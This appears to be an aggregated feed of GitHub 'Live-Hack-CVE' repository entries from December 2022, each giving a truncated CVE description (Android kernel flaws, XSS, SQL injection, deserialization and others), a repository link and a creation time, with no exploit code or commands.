**In navigateUpTo of Task.java, there is a possible way to launch an intent handler with a mismatched intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20512](https://github.com/Live-Hack-CVE/CVE-2022-20512) create time: 2022-12-27T12:52:47Z

**The backup module has a path traversal vulnerability. Successful exploitation of this vulnerability causes unauthorized access to other system files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41591](https://github.com/Live-Hack-CVE/CVE-2022-41591) create time: 2022-12-27T12:52:30Z

**Some smartphones have authentication-related (including session management) vulnerabilities as the setup wizard is bypassed. Successful exploitation of this vulnerability affects the smartphone availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41590](https://github.com/Live-Hack-CVE/CVE-2022-41590) create time: 2022-12-27T12:52:26Z

**OnCommand Insight versions 7.3.1 through 7.3.14 are susceptible to an authentication bypass vulnerability in the Data Warehouse component. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38733](https://github.com/Live-Hack-CVE/CVE-2022-38733) create time: 2022-12-27T12:52:23Z

**OpenFGA is an authorization/permission engine built for developers and inspired by Google Zanzibar. During an internal security assessment, it was discovered that OpenFGA version 0.3.0 is vulnerable to authorization bypass under certain conditions. This issue has been patched in version 0.3.1 and is backward compatible CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23542](https://github.com/Live-Hack-CVE/CVE-2022-23542) create time: 2022-12-27T12:52:19Z

**In (TBD) of (TBD), there is a possible way to corrupt kernel memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-220738351References: Upstrea CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20568](https://github.com/Live-Hack-CVE/CVE-2022-20568) create time: 2022-12-27T12:52:13Z

**In TBD of aud_hal_tunnel.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-222162870References: N/A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20561](https://github.com/Live-Hack-CVE/CVE-2022-20561) create time: 2022-12-27T12:52:10Z

**In TBD of ufdt_convert, there is a possible out of bounds read due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-242067561References: N/A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20563](https://github.com/Live-Hack-CVE/CVE-2022-20563) create time: 2022-12-27T12:52:06Z

**In l2cap_chan_put of l2cap_core, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-165329981References: Upstrea CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20566](https://github.com/Live-Hack-CVE/CVE-2022-20566) create time: 2022-12-27T12:51:34Z

**Product: AndroidVersions: Android kernelAndroid ID: A-230660904References: N/A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20570](https://github.com/Live-Hack-CVE/CVE-2022-20570) create time: 2022-12-27T12:51:27Z

**In revokeOwnPermissionsOnKill of PermissionManager.java, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20559](https://github.com/Live-Hack-CVE/CVE-2022-20559) create time: 2022-12-27T12:51:20Z

**In various functions of ap_input_processor.c, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20562](https://github.com/Live-Hack-CVE/CVE-2022-20562) create time: 2022-12-27T12:51:06Z

**In _ufdt_output_strtab_to_fdt of ufdt_convert.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-24379 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20564](https://github.com/Live-Hack-CVE/CVE-2022-20564) create time: 2022-12-27T12:50:59Z

**In registerReceivers of DeviceCapabilityListener.java, there is a possible way to change preferred TTY mode due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13An CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20558](https://github.com/Live-Hack-CVE/CVE-2022-20558) create time: 2022-12-27T12:50:55Z

**Netlogon RPC Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38023](https://github.com/Live-Hack-CVE/CVE-2022-38023) create time: 2022-12-27T12:50:31Z

**Windows Kerberos Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37967](https://github.com/Live-Hack-CVE/CVE-2022-37967) create time: 2022-12-27T12:50:27Z

**Windows Kerberos RC4-HMAC Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37966](https://github.com/Live-Hack-CVE/CVE-2022-37966) create time: 2022-12-27T12:50:23Z

**Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41854](https://github.com/Live-Hack-CVE/CVE-2022-41854) create time: 2022-12-27T12:50:20Z

**In valid_out_of_special_sec_dram_addr of drm_access_control.c, there is a possible EoP due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20586](https://github.com/Live-Hack-CVE/CVE-2022-20586) create time: 2022-12-27T12:50:17Z

**In valid_out_of_special_sec_dram_addr of drm_access_control.c, there is a possible EoP due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20585](https://github.com/Live-Hack-CVE/CVE-2022-20585) create time: 2022-12-27T12:50:13Z

**The CERT_DecodeCertPackage function in Mozilla Network Security Services (NSS), as used in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, SeaMonkey before 2.17, and other products, allows remote attackers to cause a denial of service (out-of-b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0791](https://github.com/Live-Hack-CVE/CVE-2013-0791) create time: 2022-12-27T12:10:45Z

**The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1620](https://github.com/Live-Hack-CVE/CVE-2013-1620) create time: 2022-12-27T12:07:40Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6931](https://github.com/Live-Hack-CVE/CVE-2016-6931) create time: 2022-12-27T11:24:47Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2016-4271 and CVE-2016-4277. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4278](https://github.com/Live-Hack-CVE/CVE-2016-4278) create time: 2022-12-27T11:24:27Z

**CrushFTP through 8.3.0 is vulnerable to credentials theft via URL redirection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18288](https://github.com/Live-Hack-CVE/CVE-2018-18288) create time: 2022-12-27T11:24:43Z

**Liferay Portal CE 6.2.5 allows remote command execution because of deserialization of a JSON payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16891](https://github.com/Live-Hack-CVE/CVE-2019-16891) create time: 2022-12-27T12:05:11Z

**Debian-edu-config all versions < 2.11.10, a set of configuration files used for Debian Edu, and debian-lan-config < 0.26, configured too permissive ACLs for the Kerberos admin server, which allowed password changes for other Kerberos user principals. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3467](https://github.com/Live-Hack-CVE/CVE-2019-3467) create time: 2022-12-27T11:24:40Z

**TigerVNC version prior to 1.10.1 is vulnerable to heap buffer overflow. Vulnerability could be triggered from CopyRectDecoder due to incorrect value checks. Exploitation of this vulnerability could potentially result into remote code execution. This attack appear to be exploitable via network connectivity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15692](https://github.com/Live-Hack-CVE/CVE-2019-15692) create time: 2022-12-27T11:24:33Z

**A vulnerability was found in Pengu. It has been declared as problematic. Affected by this vulnerability is the function runApp of the file src/index.js. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The name of the patch is aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91. It is rec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36623](https://github.com/Live-Hack-CVE/CVE-2020-36623) create time: 2022-12-27T12:03:28Z

**A vulnerability, which was classified as problematic, has been found in chedabob whatismyudid. Affected by this issue is the function exports.enrollment of the file routes/mobileconfig.js. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is bb33d4325fba80e7ea68b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36621](https://github.com/Live-Hack-CVE/CVE-2020-36621) create time: 2022-12-27T12:03:24Z

**A vulnerability was found in sah-comp bienlein and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The name of the patch is d7836a4f2b241e4745ede194f0f6fb47199cab6b. It is recommended to apply a patch to f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36622](https://github.com/Live-Hack-CVE/CVE-2020-36622) create time: 2022-12-27T12:03:21Z

**** DISPUTED ** A vulnerability was found in ewxrjk sftpserver. It has been declared as problematic. Affected by this vulnerability is the function sftp_parse_path of the file parse.c. The manipulation leads to uninitialized pointer. The real existence of this vulnerability is still doubted at the moment. The name of th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36617](https://github.com/Live-Hack-CVE/CVE-2020-36617) create time: 2022-12-27T11:25:14Z

**** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in destiny.gg chat. It has been rated as problematic. This issue affects the function websocket.Upgrader of the file main.go. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The name of the patch is bebd256fc3063111fb4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36625](https://github.com/Live-Hack-CVE/CVE-2020-36625) create time: 2022-12-27T11:22:28Z

**A SQL injection vulnerability in Sourcecodester Online Grading System 1.0 allows remote attackers to execute arbitrary SQL commands via the uname parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31650](https://github.com/Live-Hack-CVE/CVE-2021-31650) create time: 2022-12-27T12:05:02Z

**Deserialization issue discovered in Ruoyi before 4.6.1 allows remote attackers to run arbitrary code via weak cipher in Shiro framework. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38241](https://github.com/Live-Hack-CVE/CVE-2021-38241) create time: 2022-12-27T12:04:59Z

**A vulnerability, which was classified as problematic, has been found in sileht bird-lg. This issue affects some unknown processing of the file templates/layout.html. The manipulation of the argument request_args leads to cross site scripting. The attack may be initiated remotely. The name of the patch is ef6b32c527478f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4274](https://github.com/Live-Hack-CVE/CVE-2021-4274) create time: 2022-12-27T12:04:24Z

**A vulnerability classified as problematic was found in studygolang. This vulnerability affects the function Search of the file http/controller/search.go. The manipulation of the argument q leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4273](https://github.com/Live-Hack-CVE/CVE-2021-4273) create time: 2022-12-27T12:04:21Z

**A vulnerability classified as problematic has been found in studygolang. This affects an unknown part of the file static/js/topics.js. The manipulation of the argument contentHtml leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is 0fb30f9640bd5fa0cae58922eac6c00bb1a9 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4272](https://github.com/Live-Hack-CVE/CVE-2021-4272) create time: 2022-12-27T12:04:17Z

**A vulnerability was found in panicsteve w2wiki. It has been rated as problematic. Affected by this issue is the function toHTML of the file index.php of the component Markdown Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is 8f1d0470b4ddb1c7699e3308e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4271](https://github.com/Live-Hack-CVE/CVE-2021-4271) create time: 2022-12-27T12:04:14Z

**A vulnerability was found in Imprint CMS. It has been classified as problematic. Affected is the function SearchForm of the file ImprintCMS/Models/ViewHelpers.cs. The manipulation of the argument query leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 6140b140ccd02b5e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4270](https://github.com/Live-Hack-CVE/CVE-2021-4270) create time: 2022-12-27T12:04:11Z

**A vulnerability has been found in SimpleRisk and classified as problematic. This vulnerability affects the function checkAndSetValidation of the file simplerisk/js/common.js. The manipulation of the argument title leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 20220306-001 is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4269](https://github.com/Live-Hack-CVE/CVE-2021-4269) create time: 2022-12-27T12:04:07Z

**A vulnerability, which was classified as problematic, was found in phpRedisAdmin up to 1.17.3. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 1.18.0 is able to address this issue. The name of the patch is b9039adbb CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4268](https://github.com/Live-Hack-CVE/CVE-2021-4268) create time: 2022-12-27T12:04:04Z

**A vulnerability classified as problematic was found in tad_discuss. Affected by this vulnerability is an unknown functionality. The manipulation of the argument DiscussTitle leads to cross site scripting. The attack can be launched remotely. The name of the patch is af94d034ff8db642d05fd8788179eab05f433958. It is recom CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4267](https://github.com/Live-Hack-CVE/CVE-2021-4267) create time: 2022-12-27T12:04:00Z

**A vulnerability classified as problematic has been found in Webdetails cpf up to 9.5.0.0-80. Affected is an unknown function of the file core/src/main/java/pt/webdetails/cpf/packager/DependenciesPackage.java. The manipulation of the argument baseUrl leads to cross site scripting. It is possible to launch the attack rem CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4266](https://github.com/Live-Hack-CVE/CVE-2021-4266) create time: 2022-12-27T12:03:38Z

**A vulnerability was found in siwapp-ror. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 924d16008cfcc09356c87db01848e45290cb58ca. It is recommended to apply a patch to fix this i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4265](https://github.com/Live-Hack-CVE/CVE-2021-4265) create time: 2022-12-27T12:03:35Z

**A vulnerability, which was classified as problematic, has been found in leanote. This issue affects the function define of the file public/js/plugins/history.js. The manipulation of the argument content leads to cross site scripting. The attack may be initiated remotely. The name of the patch is https:/github.com/leano CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4263](https://github.com/Live-Hack-CVE/CVE-2021-4263) create time: 2022-12-27T12:03:32Z

**An issue was discovered in /Upload/admin/admin_notify.php in Seacms 11.4 allows attackers to execute arbitrary php code via the notify1 parameter when the action parameter equals set. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39426](https://github.com/Live-Hack-CVE/CVE-2021-39426) create time: 2022-12-27T12:02:46Z

**A vulnerability, which was classified as problematic, was found in katlings pyambic-pentameter. Affected is an unknown function. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the patch is 974f21aa1b2527ef39c8afe1a5060548217deca8. It is recommended to app CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4275](https://github.com/Live-Hack-CVE/CVE-2021-4275) create time: 2022-12-27T12:01:34Z

**A Stored Cross-site scripting (XSS) vulnerability via MAster.php in Sourcecodetester Simple Client Management System (SCMS) 1.0 allows remote attackers to inject arbitrary web script or HTML via the vulnerable input fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43657](https://github.com/Live-Hack-CVE/CVE-2021-43657) create time: 2022-12-27T12:00:52Z

**Untrusted search path vulnerability in Baidunetdisk Version 7.4.3 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36631](https://github.com/Live-Hack-CVE/CVE-2021-36631) create time: 2022-12-27T12:00:48Z

**A vulnerability was found in roxlukas LMeve and classified as critical. Affected by this issue is some unknown functionality of the component Login Page. The manipulation of the argument X-Forwarded-For leads to sql injection. The attack may be launched remotely. The name of the patch is 29e1ead3bb1c1fad53b77dfc1453449 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4246](https://github.com/Live-Hack-CVE/CVE-2021-4246) create time: 2022-12-27T11:29:02Z

**A memory overflow vulnerability was found in the Linux kernel’s ipc functionality of the memcg subsystem, in the way a user calls the semget function multiple times, creating semaphores. This flaw allows a local user to starve the resources, causing a denial of service. The highest threat from this vulnerability is to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3759](https://github.com/Live-Hack-CVE/CVE-2021-3759) create time: 2022-12-27T11:28:52Z

**After tar_close(), libtar.c releases the memory pointed to by pointer t. After tar_close() is called in the list() function, it continues to use pointer t: free_longlink_longname(t->th_buf) . As a result, the released memory is used (use-after-free). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33640](https://github.com/Live-Hack-CVE/CVE-2021-33640) create time: 2022-12-27T11:28:28Z

**A vulnerability was found in kapetan dns up to 6.1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file DNS/Protocol/Request.cs. The manipulation leads to insufficient entropy in prng. The attack may be launched remotely. Upgrading to version 7.0.0 is able to address thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4248](https://github.com/Live-Hack-CVE/CVE-2021-4248) create time: 2022-12-27T11:28:08Z

**A vulnerability has been found in OWASP NodeGoat and classified as problematic. This vulnerability affects unknown code of the file app/routes/research.js of the component Query Parameter Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The name of the patch is 4a4d1db74c63fb4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4247](https://github.com/Live-Hack-CVE/CVE-2021-4247) create time: 2022-12-27T11:26:29Z

**A vulnerability was found in xml-conduit. It has been classified as problematic. Affected is an unknown function of the file xml-conduit/src/Text/XML/Stream/Parse.hs of the component DOCTYPE Entity Expansion Handler. The manipulation leads to infinite loop. It is possible to launch the attack remotely. Upgrading to ver CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4249](https://github.com/Live-Hack-CVE/CVE-2021-4249) create time: 2022-12-27T11:25:48Z

**A vulnerability classified as problematic was found in as. This vulnerability affects the function getFullURL of the file include.cdn.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 4acad1e3d2c34c017473ceea442fb3e3e078b2bd. It is recommended to apply a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4251](https://github.com/Live-Hack-CVE/CVE-2021-4251) create time: 2022-12-27T11:25:45Z

**A vulnerability has been found in ctrlo lenio and classified as problematic. Affected by this vulnerability is an unknown functionality of the file views/layouts/main.tt of the component Notice Handler. The manipulation of the argument notice.notice.text leads to cross site scripting. The attack can be launched remotel CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4254](https://github.com/Live-Hack-CVE/CVE-2021-4254) create time: 2022-12-27T11:25:35Z

**A vulnerability, which was classified as problematic, has been found in WP-Ban. This issue affects the function toggle_checkbox of the file ban-options.php. The manipulation of the argument $_SERVER["HTTP_USER_AGENT"] leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 13e0b1e9 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4252](https://github.com/Live-Hack-CVE/CVE-2021-4252) create time: 2022-12-27T11:25:32Z

**A vulnerability was found in ctrlo lenio and classified as problematic. Affected by this issue is some unknown functionality of the file views/contractor.tt. The manipulation of the argument contractor.name leads to cross site scripting. The attack may be launched remotely. The name of the patch is e1646d5cd0a2fbab9eb5 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4255](https://github.com/Live-Hack-CVE/CVE-2021-4255) create time: 2022-12-27T11:25:28Z

**A vulnerability was found in ctrlo lenio. It has been classified as problematic. This affects an unknown part of the file views/index.tt. The manipulation of the argument task.name/task.site.org.name leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is e1646d5cd0a2fbab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4256](https://github.com/Live-Hack-CVE/CVE-2021-4256) create time: 2022-12-27T11:25:25Z

**A vulnerability was found in ctrlo lenio. It has been declared as problematic. This vulnerability affects unknown code of the file views/task.tt of the component Task Handler. The manipulation of the argument site.org.name/check.name/task.tasktype.name/task.name leads to cross site scripting. The attack can be initiate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4257](https://github.com/Live-Hack-CVE/CVE-2021-4257) create time: 2022-12-27T11:25:17Z

**In read_ppmpu_info of drm_fw.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-237585040Referenc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20575](https://github.com/Live-Hack-CVE/CVE-2022-20575) create time: 2022-12-27T12:11:44Z

**In externalOnRequest of rilapplication.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239701761Refe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20576](https://github.com/Live-Hack-CVE/CVE-2022-20576) create time: 2022-12-27T12:11:40Z

**In OemSimAuthRequest::encode of wlandata.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241762281Re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20577](https://github.com/Live-Hack-CVE/CVE-2022-20577) create time: 2022-12-27T12:11:37Z

**In RadioImpl::setGsmBroadcastConfig of ril_service_legacy.cpp, there is a possible stack clash leading to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-243 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20578](https://github.com/Live-Hack-CVE/CVE-2022-20578) create time: 2022-12-27T12:11:34Z

**In RadioImpl::setCdmaBroadcastConfig of ril_service_legacy.cpp, there is a possible stack clash leading to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-24 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20579](https://github.com/Live-Hack-CVE/CVE-2022-20579) create time: 2022-12-27T12:11:30Z

**In ufdt_do_one_fixup of ufdt_overlay.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-243629453Refer CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20580](https://github.com/Live-Hack-CVE/CVE-2022-20580) create time: 2022-12-27T12:11:26Z

**Improper access control of bootloader function was discovered in Motorola Mobility Motorola e20 prior to version RONS31.267-38-8 allows attacker with local access to read partition or RAM data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3917](https://github.com/Live-Hack-CVE/CVE-2022-3917) create time: 2022-12-27T12:11:23Z

**This issue was addressed with improved checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2. An app may be able to break out of its sandbox. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42861](https://github.com/Live-Hack-CVE/CVE-2022-42861) create time: 2022-12-27T12:11:19Z

**This issue was addressed by removing the vulnerable code. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1. An app may be able to bypass Privacy preferences. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42862](https://github.com/Live-Hack-CVE/CVE-2022-42862) create time: 2022-12-27T12:11:16Z

**In the Pixel camera driver, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-245916120References: N/A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20581](https://github.com/Live-Hack-CVE/CVE-2022-20581) create time: 2022-12-27T12:11:12Z

**In SetDecompContextDb of RohcDeCompContextOfRbId.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-219265339Re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20603](https://github.com/Live-Hack-CVE/CVE-2022-20603) create time: 2022-12-27T12:11:09Z

**In SAECOMM_SetDcnIdForPlmn of SAECOMM_DbManagement.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure from a single device with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Andr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20604](https://github.com/Live-Hack-CVE/CVE-2022-20604) create time: 2022-12-27T12:11:06Z

**In EmbmsSessionData::encode of embmsdata.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241762712Re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42511](https://github.com/Live-Hack-CVE/CVE-2022-42511) create time: 2022-12-27T12:11:02Z

**In VsimOperationDataExt::encode of vsimdata.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241763050R CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42512](https://github.com/Live-Hack-CVE/CVE-2022-42512) create time: 2022-12-27T12:10:59Z

**Password recovery vulnerability in SICK SIM2000ST Partnumber 2086502 with firmware version <1.13.4 allows an unprivileged remote attacker to gain access to the userlevel defined as RecoverableUserLevel by invocating the password recovery mechanism method. This leads to an increase in their privileges on the system and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47377](https://github.com/Live-Hack-CVE/CVE-2022-47377) create time: 2022-12-27T12:10:55Z

**In ProtocolEmbmsBuilder::BuildSetSession of protocolembmsbuilder.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelA CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42513](https://github.com/Live-Hack-CVE/CVE-2022-42513) create time: 2022-12-27T12:10:52Z

**In ProtocolImsBuilder::BuildSetConfig of protocolimsbuilder.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42514](https://github.com/Live-Hack-CVE/CVE-2022-42514) create time: 2022-12-27T12:10:48Z

**TERASOLUNA Global Framework 1.0.0 (Public review version) and TERASOLUNA Server Framework for Java (Rich) 2.0.0.2 to 2.0.5.1 are vulnerable to a ClassLoader manipulation vulnerability due to using the old version of Spring Framework which contains the vulnerability.The vulnerability is caused by an improper input valid CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43484](https://github.com/Live-Hack-CVE/CVE-2022-43484) create time: 2022-12-27T12:10:41Z

**In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238914868References: N/A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20607](https://github.com/Live-Hack-CVE/CVE-2022-20607) create time: 2022-12-27T12:10:38Z

